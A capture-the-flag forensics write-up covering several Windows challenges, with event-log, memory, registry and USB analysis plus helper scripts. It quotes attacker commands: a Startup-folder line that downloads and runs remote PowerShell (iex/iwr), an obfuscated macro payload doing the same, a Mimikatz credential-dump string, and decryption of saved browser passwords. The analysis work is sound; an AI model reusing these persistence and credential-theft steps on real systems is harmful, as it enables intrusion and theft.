Event Horizon
Challenge: Our CEO's computer was compromised in a phishing attack. The attackers carefully cleared the PowerShell logs, so we don't know what they executed. Can you help us?
The download contains a logs directory, so this is Windows event log analysis. Sorting the files by size helps pick out the ones worth opening.
Microsoft-Windows-PowerShell%4Operational.evtx holds the PowerShell events, so it is the file relevant to the challenge.
Opening it in the built-in Windows Event Viewer, the very first entry is a warning about mimikatz with event ID 4100. 4100 is the "Executing Pipeline" error event: it is written when a pipeline raises an error, here the mimikatz invocation being blocked before it could do anything (dumping hashes with mimikatz needs administrator rights, for one). Filtering on 4100 and reading through the entries gives nothing useful.
Filter on event ID 4104 instead. Its task name is "Execute a Remote Command", but it is the script block logging event: it records the text of every script block the engine ran, whether typed, dropped as a file or fetched from the network (long blocks are split over several 4104 events). Sort by time; the earliest 4104 event contains the flag.
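The same 4104 hunt done offline in Python, as an added example that is not part of the original writeup. It reads the events exported from the .evtx with `wevtutil qe Microsoft-Windows-PowerShell%4Operational.evtx /lf:true /f:xml` (or Event Viewer's "Save as XML"). Long scripts are logged as several 4104 events sharing a ScriptBlockId, so the script stitches those back together in MessageNumber order before sorting by time and searching for the flag pattern; a 4100 event is included to show it being skipped. The embedded events, timestamps, ScriptBlockIds and flag are constructed for this example, not the challenge's data.

```python
#!/usr/bin/env python3
"""Pull script block text (event ID 4104) out of a PowerShell Operational log
exported as XML, reassembling blocks that were split over several events."""
import re
import sys
import xml.etree.ElementTree as ET
from collections import defaultdict

NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"
FLAG_RE = re.compile(r"HTB\{[^}]*\}")

# Constructed sample in the shape wevtutil emits. Timestamps, ScriptBlockIds and
# the flag are made up. The first script block was logged as two 4104 events
# (MessageTotal=2) and they appear out of order, as they can in a real export.
SAMPLE_XML = """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4100</EventID><TimeCreated SystemTime="2020-10-27T14:26:01.000000Z"/><EventRecordID>4</EventRecordID></System>
  <EventData><Data Name="Payload">Error Message = script blocked (constructed)</Data></EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4104</EventID><TimeCreated SystemTime="2020-10-27T14:25:55.000000Z"/><EventRecordID>3</EventRecordID></System>
  <EventData><Data Name="MessageNumber">1</Data><Data Name="MessageTotal">1</Data>
    <Data Name="ScriptBlockText">Invoke-Mimikatz -DumpCreds</Data>
    <Data Name="ScriptBlockId">00000000-0000-0000-0000-000000000002</Data></EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4104</EventID><TimeCreated SystemTime="2020-10-27T14:25:30.000000Z"/><EventRecordID>2</EventRecordID></System>
  <EventData><Data Name="MessageNumber">2</Data><Data Name="MessageTotal">2</Data>
    <Data Name="ScriptBlockText">mple_flag}' | Out-Null</Data>
    <Data Name="ScriptBlockId">00000000-0000-0000-0000-000000000001</Data></EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4104</EventID><TimeCreated SystemTime="2020-10-27T14:25:30.000000Z"/><EventRecordID>1</EventRecordID></System>
  <EventData><Data Name="MessageNumber">1</Data><Data Name="MessageTotal">2</Data>
    <Data Name="ScriptBlockText">Write-Output 'HTB{constructed_sa</Data>
    <Data Name="ScriptBlockId">00000000-0000-0000-0000-000000000001</Data></EventData>
</Event>
"""


def parse_events(xml_text):
    """wevtutil emits a bare sequence of <Event> elements (no root element, possibly
    an XML declaration); wrap them in one root so ElementTree can parse the export."""
    body = re.sub(r"^\s*<\?xml[^>]*\?>", "", xml_text)
    return ET.fromstring("<Events>" + body + "</Events>").iter(NS + "Event")


def data(event, name):
    """Value of the <Data Name="..."> element inside EventData, or '' if absent."""
    for d in event.iter(NS + "Data"):
        if d.get("Name") == name:
            return d.text or ""
    return ""


def script_blocks(xml_text):
    """Return [(time_created, script_block_id, full_text)] for every 4104 block,
    earliest first. Fragments sharing a ScriptBlockId are joined in MessageNumber order."""
    fragments = defaultdict(dict)   # ScriptBlockId -> {MessageNumber: text}
    first_seen = {}                 # ScriptBlockId -> earliest TimeCreated
    for ev in parse_events(xml_text):
        if ev.findtext(f"{NS}System/{NS}EventID") != "4104":
            continue
        sbid = data(ev, "ScriptBlockId")
        fragments[sbid][int(data(ev, "MessageNumber") or 1)] = data(ev, "ScriptBlockText")
        when = ev.find(f"{NS}System/{NS}TimeCreated").get("SystemTime")
        first_seen[sbid] = min(first_seen.get(sbid, when), when)
    blocks = [(first_seen[sbid], sbid, "".join(parts[n] for n in sorted(parts)))
              for sbid, parts in fragments.items()]
    return sorted(blocks)


def find_flags(xml_text):
    """(time, flag) for every HTB{...} that appears in a reassembled script block."""
    return [(when, flag) for when, _, text in script_blocks(xml_text)
            for flag in FLAG_RE.findall(text)]


if __name__ == "__main__":
    # python3 this.py ps.xml   (ps.xml from: wevtutil qe <file>.evtx /lf:true /f:xml)
    xml_text = open(sys.argv[1], encoding="utf-8-sig").read() if len(sys.argv) > 1 else SAMPLE_XML
    for when, sbid, text in script_blocks(xml_text):
        print(f"{when} {sbid}\n{text}\n")
    print("flags:", find_flags(xml_text))
```

Without arguments it runs on the embedded sample and reports the flag from the reassembled first block; the half-flag in each fragment on its own would not match, which is why reassembly comes before the search.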
Export
┌──(mikannse㉿kali)-[~/Desktop]
└─$ vol2 -f WIN-LQS146OE2S1-20201027-142607.raw imageinfo
Volatility Foundation Volatility Framework 2.6.1
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_24000, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_24000, Win7SP1x64_23418
                     AS Layer1 : WindowsAMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (/home/mikannse/Desktop/WIN-LQS146OE2S1-20201027-142607.raw)
                      PAE type : No PAE
                           DTB : 0x187000L
                          KDBG : 0xf80001a540a0L
          Number of Processors : 1
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0xfffff80001a55d00L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2020-10-27 14:26:09 UTC+0000
     Image local date and time : 2020-10-27 19:56:09 +0530
┌──(mikannse㉿kali)-[~/Desktop]
└─$ vol2 -f WIN-LQS146OE2S1-20201027-142607.raw --profile=Win7SP1x64 cmdscan
Volatility Foundation Volatility Framework 2.6.1
**************************************************
CommandProcess: conhost.exe Pid: 1780
CommandHistory: 0x257430 Application: cmd.exe Flags: Allocated, Reset
CommandCount: 1 LastAdded: 0 LastDisplayed: 0
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x60
Cmd #0 @ 0x23bde0: echo iex(iwr "http%3A%2F%2Fbit.ly%2FSFRCe1cxTmQwd3NfZjByM05zMUNTXzNIP30%3D.ps1") > C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3usy12fv.ps1
**************************************************
CommandProcess: conhost.exe Pid: 1796
CommandHistory: 0x2c6a90 Application: DumpIt.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x60
The console history shows the attacker writing a one-line script into the user's Startup folder, so on every logon it downloads (iwr) and runs (iex) a remote .ps1. The bit.ly path is URL-encoded base64: decoding SFRCe1cxTmQwd3NfZjByM05zMUNTXzNIP30= gives the flag.
Insider
We are given a Firefox profile. What each file in it holds is described here: https://support.mozilla.org/en-US/kb/profiles-where-firefox-stores-user-data
Saved passwords are stored encrypted: logins.json holds the ciphertext and key4.db the key that protects it. With both files present in the profile they can be decrypted with https://github.com/unode/firefox_decrypt (if the profile had a master password set, the tool prompts for it).
┌──(mikannse㉿kali)-[~/tools/other/firefox_decrypt]
└─$ python firefox_decrypt.py ~/Desktop/Mozilla/Firefox/
Select the Mozilla profile you wish to decrypt
1 -> Profiles/yodxf5e0.default
2 -> Profiles/2542z9mo.default-release
2

Website:   http://acc01:8080
Username: 'admin'
Password: 'HTB{ur_8RoW53R_H157Ory}'
Logger
This one is a USB capture. Open it in Wireshark, sort by the Info column and find the DESCRIPTOR Response DEVICE packet the device sends to the host.
Wireshark writes USB addresses as bus.device.endpoint. The descriptor exchange, whose idVendor/idProduct identify the product as a keyboard (the HID interface descriptor's bInterfaceProtocol of 1 says the same), happens on the control endpoint, address 1.16.0. The keystroke reports therefore arrive from the same device's interrupt IN endpoint, address 1.16.1.
Extract the reports (one 8-byte HID report per line):
┌──(mikannse㉿kali)-[~/Desktop]
└─$ tshark -r keystrokes.pcapng -Y "usb.src == 1.16.1" -T fields -e usbhid.data > key.txt
Convert them with the script below. In each report byte 0 is the modifier bitmap (0x02 left Shift, 0x20 right Shift) and byte 2 the usage ID of the first pressed key:
#!/usr/bin/env python3
# coding: utf-8
# Maps USB HID keyboard usage IDs to characters. Each input line is one 8-byte
# boot-keyboard report: byte 0 is the modifier bitmap (0x02 left Shift,
# 0x20 right Shift), byte 2 the usage ID of the first pressed key.
import os
import sys

lcasekey = {}
ucasekey = {}
for i, c in enumerate("abcdefghijklmnopqrstuvwxyz"):                  # usage IDs 4..29
    lcasekey[4 + i], ucasekey[4 + i] = c, c.upper()
for i, (c, s) in enumerate(zip("1234567890", "!@#$%^&*()")):           # usage IDs 30..39
    lcasekey[30 + i], ucasekey[30 + i] = c, s
for k, (c, s) in {
    40: ("Enter", "Enter"), 41: ("esc", "esc"), 42: ("Backspace", "Backspace"),
    43: ("tab", "tab"), 44: ("space", "space"), 45: ("-", "_"), 46: ("=", "+"),
    47: ("[", "{"), 48: ("]", "}"), 49: ("\\", "|"), 50: (" ", " "),
    51: (";", ":"),    # usage 51 is ';' / ':' (the original table wrongly had '(' here)
    52: ("'", '"'), 53: ("`", "~"), 54: (",", "<"), 55: (".", ">"), 56: ("/", "?"),
    57: ("CapsLock", "CapsLock"), 79: ("RightArrow", "RightArrow"),
    80: ("LeftArrow", "LeftArrow"), 84: ("/", "/"), 85: ("*", "*"), 86: ("-", "-"),
    87: ("+", "+"), 88: ("Enter", "Enter"),
}.items():
    lcasekey[k], ucasekey[k] = c, s
for i, c in enumerate("1234567890."):                                  # keypad, usage IDs 89..99
    lcasekey[89 + i] = ucasekey[89 + i] = c

# Make sure filename to open has been provided
if len(sys.argv) == 2:
    with open(sys.argv[1]) as keycodes:
        for line in keycodes:
            line = line.strip().replace(":", "")   # newer tshark prints the bytes colon-separated
            if not line:
                continue
            # Dump line to bytearray
            bytesArray = bytearray.fromhex(line)
            # See if we have a key code we know (unmapped IDs would raise KeyError)
            val = int(bytesArray[2])
            if 3 < val < 100 and val in lcasekey:
                # See if left shift or right shift was held down
                if bytesArray[0] == 0x02 or bytesArray[0] == 0x20:
                    print(ucasekey[val], end='')   # Single line output
                else:
                    print(lcasekey[val], end='')
    print()
else:
    print("USAGE: python %s [filename]" % os.path.basename(__file__))
┌──(mikannse㉿kali)-[~/tools/other/USB_pcapng]
└─$ python keyboard.py key.txt
CapsLockhtb{CapsLocki_CapsLockc4n_533_CapsLockyCapsLockouCapsLockr_CapsLockk3y2CapsLock}
Each CapsLock token toggles caps lock: letters typed while it is on come out uppercase (and Shift inverts that), while digits and punctuation are unaffected. Reading the output that way gives HTB{i_C4N_533_yOUr_K3Y2}.
Lure
We get a Word document that contains a macro. Running strings on it directly turns up a long PowerShell command line carrying a base64 blob; decode it:
┌──(mikannse㉿kali)-[~/Desktop]
└─$ echo '<SNIP>' | base64 -d
pOwErshElL $(-jOiN(($PshOMe[4]),("$PsHoME")[+15],"x");)(iwr $(("{5}{25}{8}{7}{0}{14}{3}{21}{2}{22}{15}{16}{31}{28}{11}{26}{17}{23}{27}{29}{10}{1}{6}{24}{30}{18}{13}{19}{12}{9}{20}{4}"-f "B","U","4","B","%7D","ht","R_d","//ow.ly/HT","p:","T","0","_","N","M","%7","E","f","1T","u","e","5","k","R","h","0","t","w","_","l","Y","C","U")))
This is obfuscated PowerShell: random casing, the -f format operator reordering string fragments, and characters picked out of $PSHOME by index to spell iex.
Palo Alto Unit 42's PowerShellProfiler can unwrap it: https://github.com/pan-unit42/public_tools/blob/master/powershellprofiler/PowerShellProfiler.py
┌──(mikannse㉿kali)-[~/tools/other]
└─$ python3 Powershellprofiler.py -f ~/Desktop/shell.ps1 -
<SNIP>
##### ALTERED SCRIPT #####
pOwErshElL $(-jOiN(($PshOMe[4]),("$PsHoME")[+15],"x");)(iwr $("http://ow.ly/HTB%7Bk4REfUl_w1Th_Y0UR_d0CuMeNT5%7D"))
URL-decoding the path (%7B and %7D are the braces) gives the flag.
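PowerShellProfiler did the work above; as an added example, not the tool's code and not from the writeup, here is a small Python resolver for exactly the tricks this sample uses, so the decoding can be followed by hand. It expands the -f format operator by substituting the {n} placeholders, resolves $PSHOME[n] indexing against the default Windows PowerShell 5.1 path (an assumption: the obfuscator relies on $PSHOME[4] being 'i' and $PSHOME[15] being 'e'), folds -join of string literals, and finally percent-decodes any URL left standing. The input is the base64-decoded macro payload shown above.

```python
#!/usr/bin/env python3
"""Resolve the -f format operator, $PSHOME character indexing and -join of literals
in an obfuscated PowerShell one-liner, then URL-decode the URLs that emerge."""
import re
import sys
import urllib.parse

# Assumed default install path of Windows PowerShell 5.1 on a 64-bit host. The
# obfuscator counts on fixed characters in it: $PSHOME[4] is 'i', $PSHOME[15] is 'e'.
PSHOME = r"C:\Windows\System32\WindowsPowerShell\v1.0"

# Sample input: the base64-decoded macro payload quoted in this writeup.
OBFUSCATED = r'''pOwErshElL $(-jOiN(($PshOMe[4]),("$PsHoME")[+15],"x");)(iwr $(("{5}{25}{8}{7}{0}{14}{3}{21}{2}{22}{15}{16}{31}{28}{11}{26}{17}{23}{27}{29}{10}{1}{6}{24}{30}{18}{13}{19}{12}{9}{20}{4}"-f "B","U","4","B","%7D","ht","R_d","//ow.ly/HT","p:","T","0","_","N","M","%7","E","f","1T","u","e","5","k","R","h","0","t","w","_","l","Y","C","U")))'''

STR = r'"[^"]*"'
# ("fmt" -f "a","b",...)  ->  the formatted string
FORMAT_RE = re.compile(r'\(\s*"([^"]*)"\s*-f\s*((?:' + STR + r'\s*,?\s*)+)\)', re.I)
# ("$PSHOME")[15], ($PSHOME[4]) or $PSHOME[4]  ->  the character at that index
PSHOME_RE = re.compile(r'\("\$PSHOME"\)\[\+?(\d+)\]|\(\$PSHOME\[\+?(\d+)\]\)|\$PSHOME\[\+?(\d+)\]', re.I)
# -join ("a","b",...)  ->  "ab..." once every operand is a literal
JOIN_RE = re.compile(r'-join\s*\(((?:' + STR + r'\s*,?\s*)+)\)', re.I)
URL_RE = re.compile(r'''https?://[^\s"'()]+''', re.I)


def _strings(s):
    return re.findall(r'"([^"]*)"', s)


def resolve_format(m):
    """Substitute {n} placeholders the way PowerShell's String.Format does."""
    fmt, args = m.group(1), _strings(m.group(2))
    return '"' + re.sub(r"\{(\d+)\}", lambda p: args[int(p.group(1))], fmt) + '"'


def resolve_pshome(m):
    index = int(next(g for g in m.groups() if g is not None))
    return '"%s"' % PSHOME[index]


def resolve_join(m):
    return '"' + "".join(_strings(m.group(1))) + '"'


def deobfuscate(script):
    """Apply the rewrites until a fixed point; resolved pieces can enable further ones."""
    previous = None
    while previous != script:
        previous = script
        script = PSHOME_RE.sub(resolve_pshome, script)
        script = FORMAT_RE.sub(resolve_format, script)
        script = JOIN_RE.sub(resolve_join, script)
    return script


def extract_urls(script):
    """Every URL literal in the deobfuscated script, percent-decoded (%7B/%7D are braces)."""
    return [urllib.parse.unquote(u) for u in URL_RE.findall(deobfuscate(script))]


if __name__ == "__main__":
    src = open(sys.argv[1]).read() if len(sys.argv) > 1 else OBFUSCATED
    print(deobfuscate(src))
    print(extract_urls(src))
```

The rewrites are deliberately narrow (literal strings only); anything that needs runtime state is left untouched rather than guessed, which is also why static tools like the profiler stop at the altered script and let the analyst read the rest.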
No Place To Hide
We get an RDP bitmap cache file. The client caches the screen fragments it receives as small bitmap tiles (at most 64x64 pixels), so the cache shows pieces of whatever was on screen during the session. bmc-tools extracts the tiles:
┌──(mikannse㉿kali)-[~/tools/other/bmc-tools]
└─$ ./bmc-tools.py -s ~/Desktop/Cache0000.bin -d ~/Desktop/out/
[+++] Processing a single file: '/home/mikannse/Desktop/Cache0000.bin'.
[===] 1162 tiles successfully extracted in the end.
[===] Successfully exported 1162 files.
Stitching the tiles around bin_104 back together reveals the flag (a line of text spans several tiles).
HTB{w47ch_y0ur_c0Nn3C71}
Persistence
┌──(mikannse㉿kali)-[~/Desktop]
└─$ file query
query: MS Windows registry file, NT/2000 or above
So it is a registry hive, in the NT format that every Windows release since NT/2000 still uses.
https://github.com/keydet89/RegRipper3.0 parses the hive and writes a text report that can be searched.
Persistence usually involves the autorun keys (the HKEY_LOCAL_MACHINE equivalents of the same paths apply to every user):
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce"
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices"
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"
Searching the report for Run turns up an executable:
Software\Microsoft\Windows\CurrentVersion\Run
LastWrite Time 2020-10-27 04:38:55Z
  Windows Update - C:\Windows\System32\SFRCezFfQzRuX2t3M3J5XzRMUjE5aDd9.exe
The value name imitates a Windows component, but the file name is base64; decoding it gives the flag.
HTB{1_C4n_kw3ry_4LR19h7}
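Both the Export challenge (the bit.ly path in the cmdscan history) and this one (the file name under the Run key) hide the flag as a base64 string inside an otherwise ordinary-looking artifact. The script below is an added example, not part of the writeup: it percent-decodes the text, looks for runs of base64 alphabet, keeps only those that decode to printable ASCII, retries on '/'-separated pieces when a URL path swallowed the token, and parses RegRipper's Run-key lines so each autorun entry is reported together with its decoded name. The two sample inputs are the cmdscan line and the RegRipper output quoted in this writeup.

```python
#!/usr/bin/env python3
"""Spot base64-encoded names hidden in paths, URLs and autorun entries taken from a
Volatility cmdscan listing or a RegRipper report, URL-decoding first."""
import base64
import binascii
import re
import sys
import urllib.parse

# A run of base64 alphabet long enough to be worth decoding; ordinary words are shorter.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# RegRipper prints each autorun value as an indented "name - command" line.
RUN_ENTRY = re.compile(r"^[ \t]{2,}(?P<name>.+?) - (?P<cmd>.+)$", re.M)

# Sample inputs, both quoted from this writeup: the cmdscan history entry from the
# Export challenge and the Run-key section RegRipper printed for this challenge.
CMDSCAN_LINE = r'Cmd #0 @ 0x23bde0: echo iex(iwr "http%3A%2F%2Fbit.ly%2FSFRCe1cxTmQwd3NfZjByM05zMUNTXzNIP30%3D.ps1") > C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3usy12fv.ps1'
REGRIPPER_RUN = r"""Software\Microsoft\Windows\CurrentVersion\Run
LastWrite Time 2020-10-27 04:38:55Z
  Windows Update - C:\Windows\System32\SFRCezFfQzRuX2t3M3J5XzRMUjE5aDd9.exe"""


def try_decode(token):
    """The token's plaintext if it is valid base64 for printable ASCII, else None."""
    padded = token + "=" * (-len(token) % 4)
    try:
        raw = base64.b64decode(padded, validate=True)
    except binascii.Error:
        return None
    if raw and all(0x20 <= b < 0x7f for b in raw):
        return raw.decode("ascii")
    return None


def decode_b64_tokens(text):
    """[(token, plaintext)] for every base64 run in text that decodes cleanly.
    Percent-escapes are resolved first (the bit.ly path carried %2F and %3D). Since '/'
    is both a base64 character and a URL separator, a run that fails as a whole is
    retried on its '/'-separated parts."""
    hits = []
    for m in B64_RUN.finditer(urllib.parse.unquote(text)):
        run = m.group(0)
        for cand in dict.fromkeys([run] + run.split("/")):
            plain = try_decode(cand) if len(cand) >= 16 else None
            if plain:
                hits.append((cand, plain))
                break
    return hits


def run_entries(regripper_text):
    """[(value name, command, decoded name or None)] for a RegRipper Run-key section.
    A command whose file name decodes as base64 is a strong sign the entry was planted."""
    entries = []
    for m in RUN_ENTRY.finditer(regripper_text):
        decoded = decode_b64_tokens(m["cmd"])
        entries.append((m["name"], m["cmd"], decoded[0][1] if decoded else None))
    return entries


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else CMDSCAN_LINE + "\n" + REGRIPPER_RUN
    for token, plain in decode_b64_tokens(text):
        print(f"{token} -> {plain}")
    for name, cmd, plain in run_entries(text):
        print(f"Run: {name!r} -> {cmd} ({plain or 'not base64'})")
```

Point it at a whole cmdscan or RegRipper report and it lists every decodable token; the printable-ASCII filter keeps long legitimate identifiers (which rarely decode to clean text) from flooding the output.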